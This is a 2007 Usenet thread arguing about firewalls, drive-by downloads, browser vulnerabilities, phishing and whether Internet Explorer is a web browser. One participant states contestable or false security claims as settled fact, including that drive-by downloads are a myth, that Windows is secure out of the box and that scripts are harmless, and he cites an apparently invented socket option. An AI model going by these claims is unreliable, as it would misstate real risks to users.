> workarounds).

vulnerabilities exist in most non-trivial programs whether the good guys
know about them or not so i will say *all* web browsers have unpatched
vulnerabilities and time will bear me out...

and no, the bad guys don't depend on vulnerabilities already known to
the good guys... they have their own black hat researchers and their own
vulnerability black market...

>> i'm wondering what exactly you mean by avoidability here... do you
>> mean it should be easy to avoid being exposed?
>
> It's hard getting exposed at all.

no, it's not... it's quite easy because the exploits can be served
through mainstream sites like cnn.com...

>> you are aware that these types of exploits have been known to be
>> injected into the ad rotation of legitimate, otherwise trustworthy
>> sites, right?
>
> Right. The exposure is measured by the security of the webbrowser, and
> nothing else.

wrong... exposure has to do with whether you came in contact with it,
not whether you got compromised by it...

>>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>>> exploit" as we've called it since ever?
>>
>> well, consider the possibility that a web browser is not the only
>> component on your system involved in rendering the content on a given
>> web page... the browser renders the html, but what about scripts?
>
> ECMAScript is obviously interpreted by the webbrowser as well.

aside from the fact that that is not the only script language out there...

>> what about multimedia? what about other document formats like pdf?
>
> That's external. Do you let such things load by default or what?

of course it's external, that's the point... rendering web content
normally involves external functionality in addition to what's built
into the browser... even rendering images is 'external' (and has been a
source of problems - see wmf and vml)...

and yes, people let those things load/run by default... when they click
on a pdf link they expect to see the pdf in their browser.. when they
visit a flash site they expect the flash to just work automagically...

>> strange, most people would refer to that simply as hype rather than
>> full non-reality...
>
> Indeed, since the phenomena don't belong to the description.

it doesn't belong to the strawman you use as a description, no...

>>> Just like "tracking cookies", "phone home" or "phishing".
>>
>> you don't think phishing is real either? oh boy...
>
> Phishing is described as a problem of the webbrowser and/or the WWW, but
> it's solely a PEBKAC problem, thus it's a problem within the user and
> the phenomen only a result of this. For any minimally competent user
> phishing purely is a non-threat.

it seems dustin is correct, i'm wasting my time here... it's
unreasonable to expect users to know that paypalsecurity.com is
registered to a different entity than paypal.com is...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> If the application isn't malicious, then you don't need to enforce that
>> it does what exactly it does. On the contrary, if you think that it does
>> something that it shouldn't do, then you're already considering it as
>> malicious.
>
> No, maybe someone just doesn't want it to do things like phone home to
> look for an update and it has no option to set it that way.


Then you're considering it as malicious. (does something you don't want
without asking for permission)

> Maybe they want to block a game's adverver,


Then you're considering it as malicious. Aside from that, that typically
makes the software non-working and also typically violates the EULA.

> could use the hosts file to do that too but you are also against that.


Well, maybe because it doesn't work?
Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:


> here's the thing, it's *still* presented in a way that's open to
> interpretation... your interpretation is that 'it just happens
> naturally' on hardened systems while other possible interpretations
> could easily include 'it just happens naturally' for most average users
> (who, by the way, don't have hardened systems)...


You don't need a hardened system to be secure against the typical threats of
connecting a machine to the internet. And on not especially hardened systems
it's still true that such things really don't need to happen naturally.

>> Nonsense, it is really easy because almost every webbrowser is secury by
>> default out-of-the-box.
>
> now you're just being absurd....


Or correct. Just take a look at the major players Mozilla Firefox, Mozilla
Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is a bit
obscure, but neithertheless still secure by default.

> vulnerabilities exist in most non-trivial programs whether the good guys
> know about them or not so i will say *all* web browsers have unpatched
> vulnerabilities and time will bear me out...
>
> and no, the bad guys don't depend on vulnerabilities already known to
> the good guys... they have their own black hat researchers and their own
> vulnerability black market...


Thanks for stating the trivial exception that doesn't need to be discussed.
Now, can you present some incidents showing any significant relevance?

>> It's hard getting exposed at all.
>
> no, it's not... it's quite easy because the exploits can be served
> through mainstream sites like cnn.com...


Exposure is measures by the vulnerabilities, not by the websites serving
them. Who the hell cares if cnn.com serves some third-party scripts with
malicious intends as long as the intend can't materialize into an actual
compromise?

> wrong... exposure has to do with whether you came in contact with it,
> not whether you got compromised by it...


In that case, exposure should be about 100% and every system would be
compromised. Not. Without an unpatched vulnerability, that's a no-go.

>> ECMAScript is obviously interpreted by the webbrowser as well.
>
> aside from the fact that that is not the only script language out there...


Huh? It is, especially due to imply by the HTML standard. It's also that I
have yet to see a webbrowser supporting any additional scripting language.

>>> what about multimedia? what about other document formats like pdf?
>> That's external. Do you let such things load by default or what?
>
> of course it's external, that's the point... rendering web content
> normally involves external functionality in addition to what's built
> into the browser... even rendering images is 'external' (and has been a
> source of problems - see wmf and vml)...


External ! embedded. And which webbrowser renders WMF and VML?

> it seems dustin is correct, i'm wasting my time here... it's
> unreasonable to expect users to know that paypalsecurity.com is
> registered to a different entity than paypal.com is...

Sure it's reasonable, you just shouldn't expect people to be reasonable.
Heck, when you don't know the URL syntax, then you should expect to run into
security problems. Still it's the users fault, for intentionally ignoring
minimum required knowledge.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Well, maybe because it doesn't work?
> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);

It works for game ad servers (it has been tested by me and many
other gamers) and any EULA that says you can't block ads wouldn't have a
legal leg to stand on. Just because an app phones home to check for
updates doesn't make it malicious but I may want to block it anyway just
because I can.

And you are wrong about drive by downloads (referring to another post of
yours). Maybe you need to bone up on the latest bots that are out there
in the wild.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Dustin Cook wrote:
>
> > I can't even get the fellow to answer my questions regarding BugHunter,
> > despite the fact he spent a little time assuming what it does or doesn't
> > do and went from there.
>
>
> The reasons I didn't bother to answer your questions are two-fold:
>
> - You roughly tried to imply that I talked about something that I didn't
> test, which is something I'd never do.

You are a liar. Just in the past few days you tried to defend another
one of your assumptive pontifications with the immortal logic "well,
that's what other people are reporting".

It's pretty obvious from reading your posts, that you actually test
very little if anything that you blubber about. Your only skill, if it
can be called that, is wording things in such an ambiguous way that
there's nothing to really dissect. And then insisting it's right.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:

> Sebastian G. wrote:
>
>> Well, maybe because it doesn't work?
>> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);
>
> It works for game ad servers (it has been tested by me and many
> other gamers)


We're talking about malicious applications here.

> and any EULA that says you can't block ads wouldn't have a legal leg

> to stand on.

It has, fortunately for all the legitimate adware business.

> Just because an app phones home to check for

> updates doesn't make it malicious


We're not talking about updates. And indeed, if it was such an update
functionality that could not be disabled by means of configuration, it
should be considered as malicious.

> And you are wrong about drive by downloads (referring to another post of
> yours). Maybe you need to bone up on the latest bots that are out there
> in the wild.


Which are all due to PEBKAC, not hypothetical magic vulnerability fairies.

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
[snip]
>>> Nonsense, it is really easy because almost every webbrowser is secury
>>> by default out-of-the-box.
>>
>> now you're just being absurd....
>
>
> Or correct. Just take a look at the major players Mozilla Firefox,
> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
> a bit obscure, but neithertheless still secure by default.

and the absurdity continues... apparently internet exploder (what most
people use to browse the web with) doesn't exist in your world, and of
the browsers that do exist firefox (of all things) is the one you
consider obscure...

>> vulnerabilities exist in most non-trivial programs whether the good
>> guys know about them or not so i will say *all* web browsers have
>> unpatched vulnerabilities and time will bear me out...
>>
>> and no, the bad guys don't depend on vulnerabilities already known to
>> the good guys... they have their own black hat researchers and their
>> own vulnerability black market...
>
> Thanks for stating the trivial exception that doesn't need to be
> discussed. Now, can you present some incidents showing any significant
> relevance?

lets just be perfectly clear, here... you want me to list documented
vulnerabilities in mainstream browsers for which there is no patch yet...

i just explained 2 things... the first was that the vulnerabilities that
the would get documented in the fashion you're looking for are not
necessarily the ones that are actually relevant to this discussion (it's
the ones that the blackhats know about but the whitehats don't that are
most relevant)...

the second was that we can take the assertion that most browsers contain
unpatched vulnerabilities as axiomatically true and let time do the work
of revealing the details of those vulnerabilities... in other words, if
browsers and all the components that plug into them never need security
updates ever again then you were right, otherwise not so much..

but, just to put the last nails in the coffin of the debate on how easy
it is to find vulnerabilities, these articles are all from the past
month and each one is about something different and has something
related to web browsing...
http://blogs.zdnet.com/security/?p=636
http://blogs.zdnet.com/security/?p=652
http://www.symantec.com/enterprise/security_response/weblog/ 2007/10/when_pdfs_attack_again.html
http://isc.sans.org/diary.html?storyid=3540
http://www.symantec.com/enterprise/security_response/weblog/ 2007/10/realplayer_exploit_on_the_loos.html
http://securitywatch.eweek.com/apple/safari_for_windows.html
http://www.liquidmatrix.org/blog/2007/10/12/apple-ipod-touch -iphone-tiff-vulnerability/
http://securitywatch.eweek.com/vulnerability_research/three_ new_classes_of_vulnerabilities_with_no_cure_whatsoever_1.htm l

>>> It's hard getting exposed at all.
>>
>> no, it's not... it's quite easy because the exploits can be served
>> through mainstream sites like cnn.com...
>
>
> Exposure is measures by the vulnerabilities, not by the websites serving
> them. Who the hell cares if cnn.com serves some third-party scripts with
> malicious intends as long as the intend can't materialize into an actual
> compromise?
>
>> wrong... exposure has to do with whether you came in contact with it,
>> not whether you got compromised by it...
>
>
> In that case, exposure should be about 100% and every system would be
> compromised. Not. Without an unpatched vulnerability, that's a no-go.

it's clear to me that you are equating exposure to compromise, in spite
of the fact that (for example) you can be exposed to a biological
contagion without getting sick...

>>> ECMAScript is obviously interpreted by the webbrowser as well.
>>
>> aside from the fact that that is not the only script language out
>> there...
>
>
> Huh? It is, especially due to imply by the HTML standard. It's also that
> I have yet to see a webbrowser supporting any additional scripting
> language.

the majority of web users still use ie, ie supports additional scripting
languages, and ie's jscript interpreter is separate...

>>>> what about multimedia? what about other document formats like pdf?
>>> That's external. Do you let such things load by default or what?
>>
>> of course it's external, that's the point... rendering web content
>> normally involves external functionality in addition to what's built
>> into the browser... even rendering images is 'external' (and has been
>> a source of problems - see wmf and vml)...
>
>
> External ! embedded. And which webbrowser renders WMF and VML?

no browser does, the browser hands that job off to a different component...

>> it seems dustin is correct, i'm wasting my time here... it's
>> unreasonable to expect users to know that paypalsecurity.com is
>> registered to a different entity than paypal.com is...
>
> Sure it's reasonable, you just shouldn't expect people to be reasonable.
> Heck, when you don't know the URL syntax, then you should expect to run
> into security problems. Still it's the users fault, for intentionally
> ignoring minimum required knowledge.

oh it is reasonable? ok then i suppose i can reasonably expect you to a)
list the primary domains of all the sites you visit regularly and b)
list *every* *single* domain that is also registered to those entities...

that is essentially what you're expecting others to be able to do... so
go ahead, list away...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:


> and the absurdity continues... apparently internet exploder (what most
> people use to browse the web with) doesn't exist in your world,


It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
futile to discuss it in any security content since it's well documented to
not be supposed to provide security in a hostile environment.

> and of the browsers that do exist firefox (of all things) is the one you
> consider obscure...


Which becomes quite clear when looking at the internals of Mozilla
Seamonkey. The developers of Firefox don't even bother exposing really
important configuration options in the UI or not even at all, the coding
style of the components is horrible and full of stupid ideas (with the
firefoxurl: protocol handler being the most recent absurdity).

> i just explained 2 things... the first was that the vulnerabilities that
> the would get documented in the fashion you're looking for are not
> necessarily the ones that are actually relevant to this discussion (it's
> the ones that the blackhats know about but the whitehats don't that are
> most relevant)...


This is a principle attack vector that cannot be avoided unless you have
superior software verification mechanisms (which simply aren't practical
today). Since this is not within the decision of the vendor neither the
users, it's irrelevant to discuss.

> the second was that we can take the assertion that most browsers contain
> unpatched vulnerabilities as axiomatically true and let time do the work
> of revealing the details of those vulnerabilities... in other words, if
> browsers and all the components that plug into them never need security
> updates ever again then you were right, otherwise not so much..


You're forgetting one important detail: configuration can protect against
yet unknown vulnerabilities by reducing functional exposure.

> but, just to put the last nails in the coffin of the debate on how easy
> it is to find vulnerabilities, these articles are all from the past
> month and each one is about something different and has something
> related to web browsing...
> http://blogs.zdnet.com/security/?p=636


That's not even a vulnerability.



> http://isc.sans.org/diary.html?storyid=3540

> http://securitywatch.eweek.com/apple/safari_for_windows.html
> http://www.liquidmatrix.org/blog/2007/10/12/apple-ipod-touch -iphone-tiff-vulnerability/


And they're all patched already, with very short response time.

> http://blogs.zdnet.com/security/?p=652

That's about MSIE when used in a hostile environment, which was never
supposed to be secure. Thus it's not a security violation.

>
http://www.symantec.com/enterprise/security_response/weblog/ 2007/10/when_pdfs_attack_again.html
>
http://www.symantec.com/enterprise/security_response/weblog/ 2007/10/realplayer_exploit_on_the_loos.html

> http://securitywatch.eweek.com/vulnerability_research/three_ new_classes_of_vulnerabilities_with_no_cure_whatsoever_1.htm l


And these aren't even webbrowser exploits at all.


Now is it ignorance or incompetence why you came up with these non-issues?

> it's clear to me that you are equating exposure to compromise, in spite
> of the fact that (for example) you can be exposed to a biological
> contagion without getting sick...


Oh hello, Mr. Bad Analogy Guy. The analogue world has the funny property
that you can always break a system with more brute force, whereas for
digital systems the set of input is fully enumerable (and that very trivially).

> the majority of web users still use ie, ie supports additional scripting
> languages, and ie's jscript interpreter is separate...


Abusing it as a webbrowser doesn't make it one. Of course, you don't need
any scripting, ActiveX or whatsoever to render MSIE insecure when used on
the world wide web, just like a Telnet session is always unencrypted and not
securely authenticated (which is a documented behaviour, that's why you
can't expect any security in first place).

> no browser does, the browser hands that job off to a different component...


Ok, can anyone point me over to a WMF and/or VML viewer plugin for any
decent webbrowser?

> oh it is reasonable? ok then i suppose i can reasonably expect you to a)
> list the primary domains of all the sites you visit regularly and b)
> list *every* *single* domain that is also registered to those entities...


I don't need to. I just don't create any false positive, but it's fully
secure to not trust a website belonging to an entity due to different
domain. As for your example, paypalsecurity.com doesn't belong to paypal.com
until proven otherwise, period.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
>> and the absurdity continues... apparently internet exploder (what most
>> people use to browse the web with) doesn't exist in your world,
>
>
> It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
> futile to discuss it in any security content since it's well documented
> to not be supposed to provide security in a hostile environment.

i see...

well, all i can say is that those things you disagree with regarding
drive-by downloading apply to the world where IE *is* a web browser -
the most popular one in fact, and firefox, rather than being the obscure
one of the bunch, is probably the second most popular...

since this doesn't appear to be the world you live in i don't think i
have anything more to say to you on the subject... i'm really not
familiar enough with the properties of your world to comment on them...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:

> Sebastian G. wrote:
>> kurt wismer wrote:
>>
>>> and the absurdity continues... apparently internet exploder (what most
>>> people use to browse the web with) doesn't exist in your world,
>>
>> It does, but it isn't a webbrowser and therefore counts as PEBKAC. It's
>> futile to discuss it in any security content since it's well documented
>> to not be supposed to provide security in a hostile environment.
>
> i see...
>
> well, all i can say is that those things you disagree with regarding
> drive-by downloading apply to the world where IE *is* a web browser -


Will you please shut up and read the documentation and/or look at the
implementation? The security model is to provide confluent protection in a
secure environment, but not in a hostile environment. And surely it doesn't
even get SGML comment pasing right, how should it ever get HTML right?

So once again: Being commonly abused as a webbrowser still doesn't make it
one. Telnet isn't a webbrowser either.

And despite your ranting, discussing security on IE is pointless, since in
your scenario it's insecure by design.

Re: Jetico Personal Firewall freeware asks way to many questions

On Mon, 12 Nov 2007 09:09:39 +0100 Sebastian G. wrote:

> kurt wismer wrote:
>
>> Sebastian G. wrote:
>>> kurt wismer wrote:
>>>
>>>> and the absurdity continues... apparently internet exploder (what most
>>>> people use to browse the web with) doesn't exist in your world,
>>>
>
> Will you please shut up and read the documentation and/or look at the
> implementation? The security model is to provide confluent protection in a
> secure environment, but not in a hostile environment. And surely it doesn't
> even get SGML comment pasing right, how should it ever get HTML right?
>
> So once again: Being commonly abused as a webbrowser still doesn't make it
> one. Telnet isn't a webbrowser either.
>
> And despite your ranting, discussing security on IE is pointless, since in
> your scenario it's insecure by design.

Regardless who is "right" in this discussion - one thing is for sure: The
wording in your postings in this newsgroup is simply embarrassing, and it's
more than obvious that you have a complete lack of social competence.

Poor Sebastian - you must have been the most hated child in kindergarten
....

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>> Sebastian G. wrote:
>>> kurt wismer wrote:
>>>
>>>> and the absurdity continues... apparently internet exploder (what
>>>> most people use to browse the web with) doesn't exist in your world,
>>>
>>> It does, but it isn't a webbrowser and therefore counts as PEBKAC.
>>> It's futile to discuss it in any security content since it's well
>>> documented to not be supposed to provide security in a hostile
>>> environment.
>>
>> i see...
>>
>> well, all i can say is that those things you disagree with regarding
>> drive-by downloading apply to the world where IE *is* a web browser -
>
> Will you please shut up and read the documentation and/or look at the
> implementation?

my aren't you pleasant...

> The security model is to provide confluent protection in
> a secure environment, but not in a hostile environment. And surely it
> doesn't even get SGML comment pasing right, how should it ever get HTML
> right?

you make an excellent argument for why it's a *bad* browser, but not for
why it isn't a browser at all...

in the world most people operate in IE is a browser... i can appreciate
trying to redefine things in order to promote a paradigm shift in the
way people think about security - unfortunately it sucks for everyday
practical matters when that paradigm shift hasn't happened yet, and that
paradigm shift isn't likely to come as your behaviour doesn't encourage
people to buy into the alternative view you're proposing...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

kurt wismer wrote:

>> And surely it doesn't even get SGML comment pasing right,

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> how should it ever get HTML right?

>
> you make an excellent argument for why it's a *bad* browser, but not for
> why it isn't a browser at all...


First off, we're talking about *web*browsers.

I think it is a very strong argument against being a webbrowser. A broken
SGML parser/lexer, as the absolutely simplest part of rendering a website,
doesn't allow for getting it right at the higher layers. Thus it's
fundamentally unsuitable.

> in the world most people operate in IE is a browser...


Yes, a file browser. Not a webbrowser.

> i can appreciate trying to redefine things


No, that's what you're trying to do. You're claiming that because a lot of
people abuse the non-webbrowser IE as a webbrowser, it would actually become
one. That's silly.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Seems like a sarcastic expression of doubt, but of course it's a myth.
> There's no general way that just by visiting a website malware could be
> installed. What's needed that this actually works is a vulnerable
> webbrowser or something that is abused as such, and the trivial solution
> to this problem is not using a vulnerable webbrowser, thus it's anything
> but unavoidable.
> Instead of now throwing away their broken webbrowser or stop abusing a
> non-webbrowser as such those fools instead created a buzzword to blame
> their own incompetence on, and this buzzword is "drive-by-downloads".

Name one web browser that uses scripts that is not vulnerable. The only
one I know is firefox with the noscript add-on. That allows me to only
allow websites that I trust to run scripts. But then I've seen you in
here saying firefox is crap too so what browser do you use that is not
vulnerable? And don't tell my Lynx, I said one that allows scripts to run.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Or correct. Just take a look at the major players Mozilla Firefox,
> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
> a bit obscure, but neithertheless still secure by default.

No it isn't. Firefox allows scripts to run by default. Any browser that
allows scripts is not secure against malicious scripts. Only by using
noscript add-on does it become secure.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> As you say: it's a band-aid. Nothing more. Security starts with
> addressing the causing, not cascading the symptoms. Especially since the
> main problem, lacking user education, is even further amplified.

Well, seeing as you are certain you know how to make a system secure
without having to use anti virus scanners, spyware scanners, hosts file,
script blockers, ad blockers etc. why don't you put up a website with
instructions on how to do it and provide a real service to the community?

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Depends on which systems. Those with higher security margins have a
> global no-exec policy implemented, thus they simply can't anything but
> the preinstalled software, and as long as this is up-to-date an
> in-memory process compromise of the network is extremely unlikely.

And this is what you propose the average user does? Home users use their
computers for fun and not to pretend their computer is Fort Knox. Hello?
Earth to Sebastian G.You are out of touch with reality. You sure you are
not posting from within the local loony bin?

Re: Jetico Personal Firewall freeware asks way to many questions

Straight Talk wrote:

> Please name one that will infect a patched web browser of reasonable
> quality just like that.

Browsers don't get patched until after the exploit has infected
thousands of users PC's. That's how it works, or haven't you noticed?

http://www.swatit.org/bots/

The measures that Sebastian proposes to secure a home computer are just
unrealistic and he is out to lunch. Maybe you too.

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

Re: Jetico Personal Firewall freeware asks way to many questions

Troglodyte wrote:

> Sebastian G. wrote:
>
>> As you say: it's a band-aid. Nothing more. Security starts with
>> addressing the causing, not cascading the symptoms. Especially since the
>> main problem, lacking user education, is even further amplified.
>
> Well, seeing as you are certain you know how to make a system secure
> without having to use anti virus scanners, spyware scanners, hosts file,
> script blockers, ad blockers etc. why don't you put up a website with
> instructions on how to do it and provide a real service to the community?


Because, with respect to the demands of a normal home user, Windows is
secure out of the box? And since anti virus scanners, spyware scanners,
hosts file, script blockers, ad blockers etc. can't make a system secure,
there's nothing to discuss at all.

Re: Jetico Personal Firewall freeware asks way to many questions

Troglodyte wrote:


> Name one web browser that uses scripts that is not vulnerable.


Mozilla/Firefox, Opera, Konqueror, w3m, ...

> The only one I know is firefox with the noscript add-on. That allows me
to > only allow websites that I trust to run scripts.

Well, if you want that, you wouldn't need NoScript either, since Firefox
already has this capability (just doesn't expose it in the GUI). At any
rate, the real benefit of NoScript is to potentially limit XSS when actually
globally allowing scripts.

> But then I've seen you in here saying firefox is crap too so what browser
> do you use that is not vulnerable?

Mozilla Seamonkey

Re: Jetico Personal Firewall freeware asks way to many questions

Troglodyte wrote:

> Sebastian G. wrote:
>
>> Or correct. Just take a look at the major players Mozilla Firefox,
>> Mozilla Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is
>> a bit obscure, but neithertheless still secure by default.
>
> No it isn't. Firefox allows scripts to run by default.


So you're equating scripts with vulnerabilities? What a nonsense.

> Any browser that allows scripts is not secure against malicious scripts.

Bullshit. Without a vulnerability in the script engine itself JavaScript is
perfectly secure. And such vulnerabilities are so rare, and even further
some serious vendors liek Mozilla and the KDE Team have an excellent
vulnerability patching policy.

> Only by using noscript add-on does it become secure.

It might be a really good thing if you inform yourself a bit about
ECMAScript/JavaScript.

Re: Jetico Personal Firewall freeware asks way to many questions

Troglodyte wrote:

> Sebastian G. wrote:
>
>> Depends on which systems. Those with higher security margins have a
>> global no-exec policy implemented, thus they simply can't anything but
>> the preinstalled software, and as long as this is up-to-date an
>> in-memory process compromise of the network is extremely unlikely.
>
> And this is what you propose the average user does?


Nothing? So far a recent Windows installation is secure out-of-the-box.

As an additional recommendation, a global no-exec policy is actually very
feasible, since the demands of users typically only change rarely.

Re: Jetico Personal Firewall freeware asks way to many questions

Troglodyte wrote:

> Straight Talk wrote:
>
>> Please name one that will infect a patched web browser of reasonable
>> quality just like that.
>
> Browsers don't get patched until after the exploit has infected
> thousands of users PC's.


Wrong. Browsers typically get patched before a full description of the
vulnerability is released. Even for the extremely rare cases where that
didn't hold typically a workaround existed, and even further a simple
proactive configuration could have already addressed the problem.

> http://www.swatit.org/bots/


| or adverts for web sites with infectious downloads or even infectious HTML
| using the Active-X exploit for Microsoft Internet Explorer

That's MSIE, not a webbrowser. Of course when you're abusing MSIE as such,
compromise is inherent - as documented and expected.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> kurt wismer wrote:
>
>>> And surely it doesn't even get SGML comment pasing right,
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >> how should it ever get HTML right?
>
>>
>> you make an excellent argument for why it's a *bad* browser, but not
>> for why it isn't a browser at all...
>
>
> First off, we're talking about *web*browsers.

never said otherwise...

> I think it is a very strong argument against being a webbrowser. A
> broken SGML parser/lexer, as the absolutely simplest part of rendering a
> website, doesn't allow for getting it right at the higher layers. Thus
> it's fundamentally unsuitable.

just because it's unsuitable as a web browser doesn't mean it isn't
one... just because it's implementation of this or that is broken
doesn't mean it isn't a web browser...

it was designed to allow people to browse the web, it was marketed as a
tool to allow people to browse the web, and it actually *does* allow
people to browse the web... whether it does a good job or is well
implemented doesn't change the fact that it's a web browser, it only
affects it's *quality* as a web browser...

>> in the world most people operate in IE is a browser...
>
>
> Yes, a file browser. Not a webbrowser.

sorry, no... ie was born out of the mosaic web browser technology
microsoft purchased/licensed in order to compete with netscape - it is
most definitely a *web* browser...

windows explorer is a file browser, and while ie can *also* browse a
file system, that doesn't change the fact that it is a web browser...

>> i can appreciate trying to redefine things
>
>
> No, that's what you're trying to do. You're claiming that because a lot
> of people abuse the non-webbrowser IE as a webbrowser, it would actually
> become one. That's silly.

now you're putting words in my mouth - i never said the fact that people
use it as a web browser was the reason it was a web browser... what i
have implied, however, is that given the vast majority recognizes it as
a web browser, your *reality* represents a redefinition of things...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Wrong. Browsers typically get patched before a full description of the
> vulnerability is released.

BS

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> It might be a really good thing if you inform yourself a bit about
> ECMAScript/JavaScript.

Might be a really good thing if you educate yourself on why scripts can
be a very bad thing. Lots of malicious websites out there, boyo.

http://noscript.net/

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Well, if you want that, you wouldn't need NoScript either, since Firefox
> already has this capability (just doesn't expose it in the GUI).

IE can do that too but that's not the same as an add-on that allows one
to allow scripts to run at urls they trust and not any others. Allowing
scipts globally is just asking for trouble.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Because, with respect to the demands of a normal home user, Windows is
> secure out of the box?

Hahaha...thanks for the laugh. Now pull the other leg.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Nothing? So far a recent Windows installation is secure out-of-the-box.

Come, come, even noobs know that is not true.

> As an additional recommendation, a global no-exec policy is actually
> very feasible, since the demands of users typically only change rarely.

Well, that wouldn't work for me or most other people I know as we are
always installing new software and games etc.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:

> Mozilla Seamonkey

What makes Seamonkey a safer browser than Firefox? I don't want a
browser that is an all-in-one app anyway.


http://www.seamonkey-project.org/


> Under the hood, SeaMonkey uses much of the same Mozilla source code which powers such successful siblings as Firefox, Thunderbird, Camino, Sunbird and Miro. Legal backing is provided by the Mozilla Foundation.

Re: Jetico Personal Firewall freeware asks way to many questions

John Adams wrote:


>> Mozilla Seamonkey
>
> What makes Seamonkey a safer browser than Firefox?


Competent programmers who actually care for the users?

> I don't want a browser that is an all-in-one app anyway.


And the funny thing is that it's still less bloated than Firefox.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in news:5qjfduFvlpftU1
@mid.dfncis.de:

> John Adams wrote:
>
>
>>> Mozilla Seamonkey
>>
>> What makes Seamonkey a safer browser than Firefox?
>
>
> Competent programmers who actually care for the users?

Do you intend to address my questions directed to you sir? Or continue to
ignore them?

It's painfully obvious you don't know wtf your talking about here and
haven't for sometime, but I think I've been more than fair with you.



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Dustin Cook wrote:

> "Sebastian G." wrote in news:5qjfduFvlpftU1
> @mid.dfncis.de:
>
>> John Adams wrote:
>>
>>
>>>> Mozilla Seamonkey
>>> What makes Seamonkey a safer browser than Firefox?
>>
>> Competent programmers who actually care for the users?
>
> Do you intend to address my questions directed to you sir? Or continue to
> ignore them?


If you want a detailed analysis of the differences you'd need to carefully
study the architecture of the mentioned programs, as well as the
configuration of the particular components.

One classical example: Mozilla Firefox doesn't expose the SSL configuration
options and has all weak chiffre/hash options allowed by default.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5qlqgoF10b33tU1@mid.dfncis.de:

> Dustin Cook wrote:
>
>> "Sebastian G." wrote in news:5qjfduFvlpftU1
>> @mid.dfncis.de:
>>
>>> John Adams wrote:
>>>
>>>
>>>>> Mozilla Seamonkey
>>>> What makes Seamonkey a safer browser than Firefox?
>>>
>>> Competent programmers who actually care for the users?
>>
>> Do you intend to address my questions directed to you sir? Or
>> continue to ignore them?
>
>
> If you want a detailed analysis of the differences you'd need to
> carefully study the architecture of the mentioned programs, as well as
> the configuration of the particular components.
>
> One classical example: Mozilla Firefox doesn't expose the SSL
> configuration options and has all weak chiffre/hash options allowed by
> default.
>

I wasn't talking about Firefox. I was talking about your comments related
to BugHunter, specifically.


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt